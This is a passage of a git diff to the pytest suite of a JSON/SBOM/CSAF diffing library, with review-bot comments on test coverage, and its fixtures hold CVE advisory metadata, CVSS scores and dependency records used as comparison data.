log4shell-critical-remote-code-execution-vulnerability-in-h2database-console","url":"https://www.secpod.com/blog/log4shell-critical-remote-code-execution-vulnerability-in-h2database-console"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.h2database/h2@vers:maven/>=1.1.100|<2.0.206"]}],"title":"CVE-2021-42392/pkg:maven/com.h2database/h2@1.4.199?type=jar"}]}
\ No newline at end of file
diff --git a/test/test_bom_diff.py b/test/test_bom_diff.py
index e12d883..2ba7b0f 100644
--- a/test/test_bom_diff.py
+++ b/test/test_bom_diff.py
@@ -318,8 +318,10 @@ def results(): def test_bom_diff(results, options_1): result, j1, j2 = compare_dicts(options_1) _, result_summary = perform_bom_diff(j1, j2) - assert unpack_misc_data(result_summary, j1.options) == results["result_4"] - + x = unpack_misc_data(result_summary, j1.options) + assert len(x.get("diff_summary", {}).get(j1.filename, {}).get("components", {}).get("frameworks", [])) == 13 + assert len(x.get("diff_summary", {}).get(j2.filename, {}).get("components", {}).get("frameworks", [])) == 1 + assert len(x.get("common_summary", {}).get("components", {}).get("frameworks", [])) == 5 def test_bom_diff_component_options(results, bom_dicts_1, bom_dicts_2, bom_dicts_3, bom_dicts_4, bom_dicts_5, bom_dicts_6, bom_dicts_7, bom_dicts_8): # test --allow-new-data for components diff --git a/test/test_csaf_diff.py b/test/test_csaf_diff.py index e5c3e53..edcca77 100644 --- a/test/test_csaf_diff.py +++ b/test/test_csaf_diff.py @@ -4,7 +4,7 @@ import pytest from custom_json_diff.lib.custom_diff import compare_dicts, perform_csaf_diff -from custom_json_diff.lib.custom_diff_classes import (CsafDicts, CsafVulnerability, Options, BomVdr, BomVdrAffects +from custom_json_diff.lib.custom_diff_classes import (CsafVulnerability, Options, BomVdr, BomVdrAffects ) 
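Review bot: After this change `results` is no longer referenced anywhere in test_bom_diff, so the fixture parameter is dead, and the three length checks are a much weaker oracle than the removed equality against `results["result_4"]` — a frameworks entry with the right count but wrong content now passes. If the full fixture was dropped because it drifts too easily, a narrower content check (for example the set of `bom-ref` values in each frameworks list) would keep some coverage of what the diff actually reports. The `.get(..., {})` chains also turn a missing key into a bare count mismatch; in a test, plain indexing such as `x["diff_summary"][j1.filename]["components"]["frameworks"]` fails on the missing key by name. `x` could be named for what it holds, e.g. `misc_data`.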
@@ -14,111 +14,13 @@ def options_1(): @pytest.fixture -def options_3(): - return Options(file_1="test/csaf_1.json", file_2="test/csaf_2.json", preconfig_type="csaf", allow_new_data=True) +def options_2(): + return Options(file_1="test/csaf_3.json", file_2="test/csaf_4.json", preconfig_type="csaf", exclude=["vulnerabilities.[].acknowledgements"]) @pytest.fixture -def csaf_dicts_1(): - options = Options(file_1="csaf_1.json", file_2="csaf_2.json", preconfig_type="csaf", allow_new_data=True) - return CsafDicts(options, "csaf_1.json", vulnerabilities=[CsafVulnerability({ - "acknowledgements": [ - [ - { - "organization": "NVD", - "urls": [ - "https://nvd.nist.gov/vuln/detail/CVE-2024-39689" - ] - } - ] - ], - "cve": "CVE-2024-39689", - "cwe": { - "id": "345", - "name": "Insufficient Verification of Data Authenticity" - }, - "discovery_date": "2024-07-05T20:06:40", - "ids": [ - { - "system_name": "CVE Record", - "text": "CVE-2024-39689" - }, - { - "system_name": "GitHub Advisory", - "text": "GHSA-248v-346w-9cwc" - } - ], - "notes": [ - { - "category": "description", - "details": "Vulnerability Description", - "text": "Certifi removes GLOBALTRUST root certificate" - }, - { - "category": "details", - "details": "Vulnerability Details", - "text": "# Certifi removes GLOBALTRUST root certificate Certifi 2024.07.04 removes root certificates from \"GLOBALTRUST\" from the root store. These are in the process of being removed from Mozilla's trust store. GLOBALTRUST's root certificates are being removed pursuant to an investigation which identified \"long-running and unresolved compliance issues\". Conclusions of Mozilla's investigation can be found [here]( https://groups.google.com/a/mozilla.org/g/dev-security-policy/c/XpknYMPO8dI)." 
- } - ], - "product_status": { - "known_affected": [ - "certifi@vers:pypi/>=2021.05.30|<2024.07.04" - ], - "known_not_affected": [ - "certifi@2024.07.04" - ] - }, - "references": [ - { - "summary": "GitHub Advisory GHSA-248v-346w-9cwc", - "url": "https://github.com/certifi/python-certifi/security/advisories/GHSA-248v-346w-9cwc" - }, - { - "summary": "Google Mailing List", - "url": "https://groups.google.com/a/mozilla.org/g/dev-security-policy/c/XpknYMPO8dI" - }, - { - "summary": "CVE Record", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39689" - } - ], - "scores": [ - { - "cvss_v3": { - "attackComplexity": "HIGH", - "attackVector": "NETWORK", - "availabilityImpact": "NONE", - "baseScore": 3.1, - "baseSeverity": "LOW", - "confidentialityImpact": "LOW", - "environmentalScore": 3.1, - "environmentalSeverity": "LOW", - "integrityImpact": "NONE", - "modifiedAttackComplexity": "HIGH", - "modifiedAttackVector": "NETWORK", - "modifiedAvailabilityImpact": "NONE", - "modifiedConfidentialityImpact": "LOW", - "modifiedIntegrityImpact": "NONE", - "modifiedPrivilegesRequired": "NONE", - "modifiedScope": "UNCHANGED", - "modifiedUserInteraction": "REQUIRED", - "privilegesRequired": "NONE", - "scope": "UNCHANGED", - "temporalScore": 3.1, - "temporalSeverity": "LOW", - "userInteraction": "REQUIRED", - "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N", - "version": "3.1" - }, - "products": [ - "certifi@vers:pypi/>=2021.05.30|<2024.07.04" - ] - } - ], - "title": "CVE-2024-39689/pkg:pypi/certifi@2023.7.22" - }, options) - - ]) +def options_3(): + return Options(file_1="test/csaf_1.json", file_2="test/csaf_2.json", preconfig_type="csaf", allow_new_data=True) @pytest.fixture 
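Review bot: The `exclude=["vulnerabilities.[].acknowledgements"]` argument in the new options_2 fixture is the only place this path syntax appears in the file, and nothing says what `[]` denotes. A comment such as `# "[]" presumably addresses every element of the vulnerabilities array, dropping acknowledgements from each — confirm against the library's path handling` would save the next reader a lookup. options_3 is otherwise only moved below options_2 and is unchanged.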
@@ -127,132 +29,217 @@ def results(): return json.load(f) -def test_csaf_diff(results, options_1): +def test_csaf_diff(results, options_1, options_2): result, j1, j2 = compare_dicts(options_1) _, result_summary = perform_csaf_diff(j1, j2) assert result_summary == results["result_13"] + result, j2, j1 = compare_dicts(options_1) _, result_summary = perform_csaf_diff(j2, j1) - results["result_14"] = result_summary assert result_summary == results["result_14"] + result, j1, j2 = compare_dicts(options_2) + _, result_summary = perform_csaf_diff(j2, j1) + assert result_summary["diff_summary"] == {"test/csaf_3.json": {}, "test/csaf_4.json": {}} + def test_csaf_diff_vuln_options(options_1): # test don't allow --allow-new-data or --allow-new-versions - bom1 = BomVdr(id="CVE-2022-25881",options=options_1) - bom2 = BomVdr(id="CVE-2022-25881",options=options_1) - bom2.options.doc_num = 2 - assert bom1 == bom2 - bom2.id = "CVE-2022-25883" - assert bom1 != bom2 - bom1.clear(), bom2.clear() - - bom1.bom_ref, bom2.bom_ref = "NPM-1091792/pkg:npm/base64url@0.0.6", "NPM-1091792/pkg:npm/base64url@0.0.6" - assert bom1 == bom2 - bom2.bom_ref = "NPM-1091792/pkg:npm/base64url@0.0.7" - assert bom1 != bom2 - bom1.clear(), bom2.clear() - - bom1.advisories = [{"url": "https://security.netapp.com/advisory/ntap-20230622-0008"}] - bom2.advisories = [{"url": "https://security.netapp.com/advisory/ntap-20230622-0008"}] - assert bom1 == bom2 - bom2.advisories = [{"url": "https://security.netapp.com/advisory/ntap-20230622-0009"}] - assert bom1 != bom2 - bom1.clear(), bom2.clear() - - bom1.affects = [BomVdrAffects({"ref": "pkg:npm/libxmljs2@0.33.0", "versions": [{ - "range": "vers:npm/>=0.0.0|<=1.0.11", "status": "affected"}]}, options=bom1.options)] - bom2.affects = [BomVdrAffects(data={"ref": "pkg:npm/libxmljs2@0.33.0", "versions": [{ - "range": "vers:npm/>=0.0.0|<=1.0.11", "status": "affected"}]}, options=bom2.options)] - assert bom1 == bom2 - bom2.affects = [BomVdrAffects(data={"ref": 
"pkg:npm/libxmljs2@0.33.1", "versions": [{ - "range": "vers:npm/>=0.0.0|<=1.0.11", "status": "affected"}]}, options=bom2.options)] - assert bom1 != bom2 - bom1.clear(), bom2.clear() - - bom1.analysis = {"state": "exploitable", "detail": "See https://seclists.org/bugtraq/2019/May/68"} - bom2.analysis = {"state": "exploitable", "detail": "See https://seclists.org/bugtraq/2019/May/68"} - assert bom1 == bom2 - bom1.analysis = {} - assert bom1 != bom2 - bom1.clear(), bom2.clear() - - bom1.cwes = ["1333"] - bom2.cwes = ["1333"] - assert bom1 == bom2 - bom2.cwes = ["1333", "1334"] - assert bom1 != bom2 - bom1.clear(), bom2.clear() - - bom1.description = "lorem ipsum dolor sit amet" - bom2.description = "lorem ipsum dolor sit amet" - assert bom1 == bom2 - bom2.description = "lorem ipsum dolor" - assert bom1 != bom2 - bom1.clear(), bom2.clear() + csaf1 = CsafVulnerability({"cve": "CVE-2022-25881"},options=options_1) + csaf2 = CsafVulnerability({"cve": "CVE-2022-25881"},options=options_1) + csaf2.options.doc_num = 2 + assert csaf1 == csaf2 + csaf2.cve = "CVE-2022-25883" + assert csaf1 != csaf2 + csaf1.clear(), csaf2.clear() - bom1.detail = "lorem ipsum dolor sit amet" - bom2.detail = "lorem ipsum dolor sit amet" - assert bom1 == bom2 - bom2.detail = "lorem ipsum dolor" - assert bom1 != bom2 - bom1.clear(), bom2.clear() + csaf1.title, csaf2.title = "NPM-1091792/pkg:npm/base64url@0.0.6", "NPM-1091792/pkg:npm/base64url@0.0.6" + assert csaf1 == csaf2 + csaf2.title = "NPM-1091792/pkg:npm/base64url@0.0.7" + assert csaf1 != csaf2 + csaf1.clear(), csaf2.clear() - bom1.properties = [{"name": "depscan:insights", "value": "Indirect dependency"}] - bom2.properties = [{"name": "depscan:insights", "value": "Indirect dependency"}] - assert bom1 == bom2 - bom2.properties = [{"name": "depscan:insights", "value": "Indirect dependency"}, {"name": "depscan:prioritized", "value": "false"}] - assert bom1 != bom2 - bom1.clear(), bom2.clear() + csaf1.product_status = { + "known_affected": [ + 
"org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.0.0|<8.5.61" + ], + "known_not_affected": [ + "org.apache.tomcat.embed/tomcat-embed-core@8.5.61" + ] + } + csaf2.product_status = { + "known_affected": [ + "org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.0.0|<8.5.61" + ], + "known_not_affected": [ + "org.apache.tomcat.embed/tomcat-embed-core@8.5.61" + ] + } + assert csaf1 == csaf2 + csaf2.product_status = { + "known_affected": [ + "org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.0.0|<8.5.61" + ] + } + assert csaf1 != csaf2 + csaf1.clear(), csaf2.clear() - bom1.published, bom2.published = "2020-09-01T20:42:44", "2020-09-01T20:42:44" - assert bom1 == bom2 - bom2.published = "2021-09-01T20:42:44" - assert bom1 != bom2 - bom1.clear(), bom2.clear() + csaf1.cwe = {"id": "502", "name": "Deserialization of Untrusted Data"} + csaf2.cwe = {"id": "502", "name": "Deserialization of Untrusted Data"} + assert csaf1 == csaf2 + csaf2.cwe = {"id": "502"} + assert csaf1 != csaf2 + csaf1.clear(), csaf2.clear() - bom1.ratings = [{"method": "CVSSv31", "severity": "MEDIUM", "score": 5.0, "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L"}] - bom2.ratings = [{"method": "CVSSv31", "severity": "MEDIUM", "score": 5.0, "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L"}] - assert bom1 == bom2 - bom2.ratings = [{"method": "CVSSv31", "severity": "MEDIUM", "score": 7.0, "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L"}] - assert bom1 != bom2 - bom1.clear(), bom2.clear() + csaf1.notes = [ + { + "category": "description", + "details": "Vulnerability Description", + "text": "Deserialization of Untrusted Data in logback" + }, + { + "category": "details", + "details": "Vulnerability Details", + "text": "# Deserialization of Untrusted Data in logback In logback version 1.2.7 and prior versions, an attacker with the required privileges to edit configurations files could craft a malicious configuration allowing to execute arbitrary code loaded from LDAP 
servers." + } + ] + csaf2.notes = [{"category": "details", "details": "Vulnerability Details", + "text": "# Deserialization of Untrusted Data in logback In logback version 1.2.7 and prior versions, an attacker with the required privileges to edit configurations files could craft a malicious configuration allowing to execute arbitrary code loaded from LDAP servers."}, + { + "category": "description", + "details": "Vulnerability Description", + "text": "Deserialization of Untrusted Data in logback" + } + ] + assert csaf1 == csaf2 + csaf2.notes.pop() + assert csaf1 != csaf2 + csaf1.clear(), csaf2.clear() - bom1.recommendation, bom2.recommendation = "lorem ipsum dolor sit amet", "lorem ipsum dolor sit amet" - assert bom1 == bom2 - bom2.recommendation = "lorem ipsum dolor" - assert bom1 != bom2 - bom1.clear(), bom2.clear() + csaf1.discovery_date, csaf2.discovery_date = "2020-09-01T20:42:44", "2020-09-01T20:42:44" + assert csaf1 == csaf2 + csaf2.discovery_date = "2021-09-01T20:42:44" + assert csaf1 != csaf2 + csaf1.clear(), csaf2.clear() - bom1.references = [{"id": "CVE-2022-23541", "source": {"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23541", "name": "NVD"}}] - bom2.references = [{"id": "CVE-2022-23541", "source": {"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23541", "name": "NVD"}}] - assert bom1 == bom2 - bom1.references.append({"id": "GHSA-hjrf-2m68-5959", "source": {"name": "GitHub Advisory", "url": "https://github.com/auth0/node-jsonwebtoken/security/advisories/GHSA-hjrf-2m68-5959"}}) - assert bom1 != bom2 - bom1.clear(), bom2.clear() + csaf1.scores = [{ + "cvss_v3": { + "attackComplexity": "HIGH", + "attackVector": "NETWORK", + "availabilityImpact": "HIGH", + "baseScore": 6.6, + "baseSeverity": "MEDIUM", + "confidentialityImpact": "HIGH", + "environmentalScore": 6.6, + "environmentalSeverity": "MEDIUM", + "integrityImpact": "HIGH", + "modifiedAttackComplexity": "HIGH", + "modifiedAttackVector": "NETWORK", + "modifiedAvailabilityImpact": "HIGH", + 
"modifiedConfidentialityImpact": "HIGH", + "modifiedIntegrityImpact": "HIGH", + "modifiedPrivilegesRequired": "HIGH", + "modifiedScope": "UNCHANGED", + "modifiedUserInteraction": "NONE", + "privilegesRequired": "HIGH", + "scope": "UNCHANGED", + "temporalScore": 6.6, + "temporalSeverity": "MEDIUM", + "userInteraction": "NONE", + "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", + "version": "3.1" + }, + "products": [ + "ch.qos.logback/logback-core@vers:maven/>=0.2.5|<=1.2.8" + ] + }] + csaf2.scores = [{ + "cvss_v3": { + "attackComplexity": "HIGH", + "attackVector": "NETWORK", + "availabilityImpact": "HIGH", + "baseScore": 6.6, + "baseSeverity": "MEDIUM", + "confidentialityImpact": "HIGH", + "environmentalScore": 6.6, + "environmentalSeverity": "MEDIUM", + "integrityImpact": "HIGH", + "modifiedAttackComplexity": "HIGH", + "modifiedAttackVector": "NETWORK", + "modifiedAvailabilityImpact": "HIGH", + "modifiedConfidentialityImpact": "HIGH", + "modifiedIntegrityImpact": "HIGH", + "modifiedPrivilegesRequired": "HIGH", + "modifiedScope": "UNCHANGED", + "modifiedUserInteraction": "NONE", + "privilegesRequired": "HIGH", + "scope": "UNCHANGED", + "temporalScore": 6.6, + "temporalSeverity": "MEDIUM", + "userInteraction": "NONE", + "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", + "version": "3.1" + }, + "products": [ + "ch.qos.logback/logback-core@vers:maven/>=0.2.5|<=1.2.8" + ] + }] + assert csaf1 == csaf2 + csaf2.scores = [{ + "cvss_v3": { + "attackComplexity": "HIGH", + "attackVector": "NETWORK", + "availabilityImpact": "HIGH", + "baseScore": 6.7, + "baseSeverity": "MEDIUM", + "confidentialityImpact": "HIGH", + "environmentalScore": 6.6, + "environmentalSeverity": "MEDIUM", + "integrityImpact": "HIGH", + "modifiedAttackComplexity": "HIGH", + "modifiedAttackVector": "NETWORK", + "modifiedAvailabilityImpact": "HIGH", + "modifiedConfidentialityImpact": "HIGH", + "modifiedIntegrityImpact": "HIGH", + "modifiedPrivilegesRequired": "HIGH", + 
"modifiedScope": "UNCHANGED", + "modifiedUserInteraction": "NONE", + "privilegesRequired": "HIGH", + "scope": "UNCHANGED", + "temporalScore": 6.6, + "temporalSeverity": "MEDIUM", + "userInteraction": "NONE", + "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", + "version": "3.1" + }, + "products": [ + "ch.qos.logback/logback-core@vers:maven/>=0.2.5|<=1.2.8" + ] + }] + assert csaf1 != csaf2 + csaf1.clear(), csaf2.clear() - bom1.source = {"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23541", "name": "NVD"} - bom2.source = {"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23541", "name": "NVD"} - assert bom1 == bom2 - bom2.source = {"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23542", "name": "NVD"} - assert bom1 != bom2 - bom1.clear(), bom2.clear() + csaf1.references = [{"summary": "CVE-2022-23541", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23541"}] + csaf2.references = [{"summary": "CVE-2022-23541", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23541"}] + assert csaf1 == csaf2 + csaf1.references.append({ + "summary": "GHSA-hjrf-2m68-5959", "url": "https://github.com/auth0/node-jsonwebtoken/security/advisories/GHSA-hjrf-2m68-5959"}) + assert csaf1 != csaf2 + csaf1.clear(), csaf2.clear() - bom1.updated, bom2.updated = "2020-09-01T20:42:44", "2020-09-01T20:42:44" - assert bom1 == bom2 - bom2.updated = "2021-09-01T20:42:44" - assert bom1 != bom2 + csaf1.acknowledgements = [{"urls": ["https://nvd.nist.gov/vuln/detail/CVE-2022-23541"], "organization": "NVD"}] + csaf2.acknowledgements = [{"urls": ["https://nvd.nist.gov/vuln/detail/CVE-2022-23541"], "organization": "NVD"}] + assert csaf1 == csaf2 + csaf2.acknowledgements = [{"urls": ["https://nvd.nist.gov/vuln/detail/CVE-2022-23542"], "organization": "NVD"}] + assert csaf1 != csaf2 + csaf1.clear(), csaf2.clear() def test_csaf_diff_vuln_options_allow_new_data(options_3): # test --allow-new-data options_3_copy = deepcopy(options_3) options_3_copy.doc_num = 2 - csaf1, csaf2 = 
CsafVulnerability(data={"title": "CVE-2022-25881"},options=options_3), CsafVulnerability(data={"title": "CVE-2022-25881"},options=options_3_copy) - assert csaf1 == csaf2 - csaf1.title, csaf2.title = "CVE-2022-25883", "" - assert csaf1 != csaf2 - csaf1.clear(), csaf2.clear() + csaf1, csaf2 = CsafVulnerability(data={},options=options_3), CsafVulnerability(data={},options=options_3_copy) csaf1.acknowledgements = [] csaf2.acknowledgements = [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-39689"]}] @@ -261,15 +248,10 @@ def test_csaf_diff_vuln_options_allow_new_data(options_3): assert csaf1 != csaf2 csaf1.clear(), csaf2.clear() - csaf1.cwe = {"id": "345", "name": "Insufficient Verification of Data Authenticity"} - csaf2.cwe = {"id": "345", "name": "Insufficient Verification of Data Authenticity"} - assert csaf1 == csaf2 - csaf1.cwe["id"] = "500" - assert csaf1 != csaf2 - csaf1.clear(), csaf2.clear() - - csaf1.discovery_date, csaf2.discovery_date = "", "2020-09-01T20:42:44" + csaf1.references = [{"summary": "CVE-2022-23541", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23541"}] + csaf2.references = [{"summary": "CVE-2022-23541", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23541"}] assert csaf1 == csaf2 - csaf1.discovery_date, csaf2.discovery_date = csaf2.discovery_date, csaf1.discovery_date + csaf1.references.append({ + "summary": "GHSA-hjrf-2m68-5959", "url": "https://github.com/auth0/node-jsonwebtoken/security/advisories/GHSA-hjrf-2m68-5959"}) assert csaf1 != csaf2 csaf1.clear(), csaf2.clear() diff --git a/test/test_custom_json_diff.py b/test/test_custom_json_diff.py index 0bb4b67..1fe090f 100644 --- a/test/test_custom_json_diff.py +++ b/test/test_custom_json_diff.py 
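Review bot: `csaf2.options.doc_num = 2` in test_csaf_diff_vuln_options mutates the same `options_1` object that `csaf1` was built from, so unless CsafVulnerability copies its options both objects end up with doc_num 2 and the test no longer compares a doc-1 object against a doc-2 object; the sibling test_csaf_diff_vuln_options_allow_new_data already handles this with a deepcopy, and `options_1_copy = deepcopy(options_1)` / `options_1_copy.doc_num = 2` passed to csaf2 would make this test consistent with it. The new options_2 block in test_csaf_diff only asserts that `diff_summary` is empty for both files, which an implementation that excluded or dropped the whole vulnerability would also satisfy; a second assertion that `common_summary` still carries the vulnerability the two fixtures share would pin the intended behaviour. That block also unpacks `result, j1, j2` and then calls `perform_csaf_diff(j2, j1)`, the reverse of the first block, and `result` is unused in all three blocks. With the BomVdr and BomVdrAffects usages removed here, those two names in the import at the top of the file look unused unless they are still referenced outside this hunk.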
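Review bot: The references block that replaces the cwe and discovery_date checks in test_csaf_diff_vuln_options_allow_new_data only asserts the inequality direction (an extra reference on the doc-1 side), which the non-allow-new-data test already covers with identical data; what the removed discovery_date check exercised, and this block does not, is that extra data on the doc-2 side is tolerated under --allow-new-data. Appending the GHSA reference to `csaf2` first and asserting `assert csaf1 == csaf2` before the existing `csaf1.references.append(...)` step would restore that. The cwe comparison is dropped with no replacement; if that is deliberate, a short comment saying why would help. The enclosing function starts in the previous hunk.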
@@ -3,7 +3,7 @@ import pytest from custom_json_diff.lib.custom_diff import ( - compare_dicts, get_diff, json_to_class + compare_dicts, get_bom_status, get_diff, json_to_class ) from custom_json_diff.lib.custom_diff_classes import Options from custom_json_diff.lib.utils import sort_dict_lists @@ -89,3 +89,17 @@ def test_sort_dict(): "a": 1, "b": 2, "c": [1, 2, 3], "d": [{"name": "test 3", "value": 1}, {"name": "test 2", "value": 2}, {"value": 3}] } + + +def test_get_bom_status(): + diff_summary_1 = {} + diff_summary_2 = {} + assert max(get_bom_status(diff_summary_1), get_bom_status(diff_summary_2)) == 0 + diff_summary_1 = {"components": {}} + assert max(get_bom_status(diff_summary_1), get_bom_status(diff_summary_2)) == 0 + diff_summary_1 = {"components": {"applications": []}} + assert max(get_bom_status(diff_summary_1), get_bom_status(diff_summary_2)) == 0 + diff_summary_1 = {"misc_data": {"key": "value"}} + assert max(get_bom_status(diff_summary_1), get_bom_status(diff_summary_2)) == 2 + diff_summary_1["services"] = [{"name": "test"}] + assert max(get_bom_status(diff_summary_1), get_bom_status(diff_summary_2)) == 3 diff --git a/test/test_data.json b/test/test_data.json index 96c1cec..d87dd00 100644 --- a/test/test_data.json +++ b/test/test_data.json 
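Review bot: Every assertion in test_get_bom_status wraps the call in `max(..., get_bom_status(diff_summary_2))` with `diff_summary_2` fixed at `{}`, so the second operand never changes the outcome and a regression in how `{}` itself is scored would be masked by the first operand; asserting `get_bom_status(diff_summary_1) == 0` and so on directly makes each case test one input. The expected values 0, 2 and 3 are bare numbers — a one-line comment naming what each status level means (or a constant from the module, if one exists) would make the test readable. No case expects 1, so whichever summary shape yields that level is untested unless it cannot occur.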
@@ -1 +1 @@ -{"result_1": {"diff_summary": {"bom_1.json": {"components": {"libraries": [{"bom-ref": "pkg:maven/joda-time/joda-time@2.9.9?type=jar", "type": "library", "description": "Date and time library to replace JDK date handling", "group": "joda-time", "name": "joda-time", "publisher": "Joda.org", "purl": "pkg:maven/joda-time/joda-time@2.9.9?type=jar", "scope": "required", "version": "2.9.9"}]}}, "bom_2.json": {"components": {"libraries": [{"bom-ref": "pkg:maven/joda-time/joda-time@2.9.9?type=jar", "type": "library", "group": "joda-time", "name": "joda-time", "publisher": "Joda.org", "purl": "pkg:maven/joda-time/joda-time@2.9.9?type=jar", "scope": "required", "version": "2.9.9"}]}}}, "common_summary": {"components": {"frameworks": [{"bom-ref": "pkg:maven/org.springframework.cloud/spring-cloud-starter-config@2.0.0.RELEASE?type=jar", "type": "framework", "group": "org.springframework.cloud", "name": "spring-cloud-starter-config", "publisher": "Pivotal Software, Inc.", "purl": "pkg:maven/org.springframework.cloud/spring-cloud-starter-config@2.0.0.RELEASE?type=jar", "scope": "required", "version": "2.0.0.RELEASE"}]}}}, "result_10": {"bomFormat": "CycloneDX", "components": [{"bom-ref": "pkg:pypi/flask@1.1.2", "evidence": {"identity": {"confidence": 1, "field": "purl", "methods": [{"confidence": 1, "technique": "instrumentation", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\venv"}]}, "occurrences": [{"location": "flask_webgoat\\__init__.py#20"}, {"location": "flask_webgoat\\actions.py#13"}, {"location": "flask_webgoat\\actions.py#16"}, {"location": "flask_webgoat\\actions.py#19"}, {"location": "flask_webgoat\\actions.py#22"}, {"location": "flask_webgoat\\actions.py#34"}, {"location": "flask_webgoat\\actions.py#4"}, {"location": "flask_webgoat\\actions.py#46"}, {"location": "flask_webgoat\\actions.py#49"}, {"location": "flask_webgoat\\actions.py#6"}, {"location": "flask_webgoat\\actions.py#7"}, {"location": "flask_webgoat\\auth.py#13"}, {"location": 
"flask_webgoat\\auth.py#23"}, {"location": "flask_webgoat\\auth.py#25"}, {"location": "flask_webgoat\\auth.py#35"}, {"location": "flask_webgoat\\auth.py#4"}, {"location": "flask_webgoat\\auth.py#44"}, {"location": "flask_webgoat\\auth.py#46"}, {"location": "flask_webgoat\\status.py#13"}, {"location": "flask_webgoat\\status.py#3"}, {"location": "flask_webgoat\\status.py#8"}, {"location": "flask_webgoat\\ui.py#14"}, {"location": "flask_webgoat\\ui.py#19"}, {"location": "flask_webgoat\\ui.py#24"}, {"location": "flask_webgoat\\ui.py#6"}, {"location": "flask_webgoat\\users.py#14"}, {"location": "flask_webgoat\\users.py#18"}, {"location": "flask_webgoat\\users.py#24"}, {"location": "flask_webgoat\\users.py#3"}, {"location": "flask_webgoat\\users.py#33"}, {"location": "flask_webgoat\\users.py#44"}, {"location": "flask_webgoat\\users.py#46"}, {"location": "flask_webgoat\\users.py#7"}]}, "name": "flask", "properties": [{"name": "ImportedModules", "value": "flask.redirect,flask.render_template,flask.jsonify,flask.Blueprint,flask.session,flask.g,flask.request,flask.Flask"}], "purl": "pkg:pypi/flask@1.1.2", "type": "framework", "version": "1.1.2"}, {"bom-ref": "pkg:pypi/werkzeug@1.0.1", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "name": "Werkzeug", "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "purl": "pkg:pypi/werkzeug@1.0.1", "type": "library", "version": "1.5.1"}, {"bom-ref": "pkg:pypi/jinja2@2.11.3", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "name": "Jinja2", "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], 
"purl": "pkg:pypi/jinja2@2.11.3", "type": "library", "version": "2.10.2"}, {"bom-ref": "pkg:pypi/markupsafe@1.1.1", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "name": "MarkupSafe", "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "purl": "pkg:pypi/markupsafe@1.1.1", "type": "library", "version": "1.1.1"}, {"bom-ref": "pkg:pypi/itsdangerous@1.1.0", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "name": "itsdangerous", "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "purl": "pkg:pypi/itsdangerous@1.1.0", "type": "library", "version": "1.1.0"}, {"bom-ref": "pkg:pypi/click@7.1.2", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "name": "click", "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "purl": "pkg:pypi/click@7.1.2", "type": "library", "version": "7.1.2"}, {"bom-ref": "pkg:github/actions/checkout@v2", "group": "actions", "name": "checkout", "purl": "pkg:github/actions/checkout@v2", "type": "application", "version": "v2"}, {"bom-ref": "pkg:github/actions/setup-python@v2", "group": "actions", "name": "setup-python", "purl": "pkg:github/actions/setup-python@v2", "type": 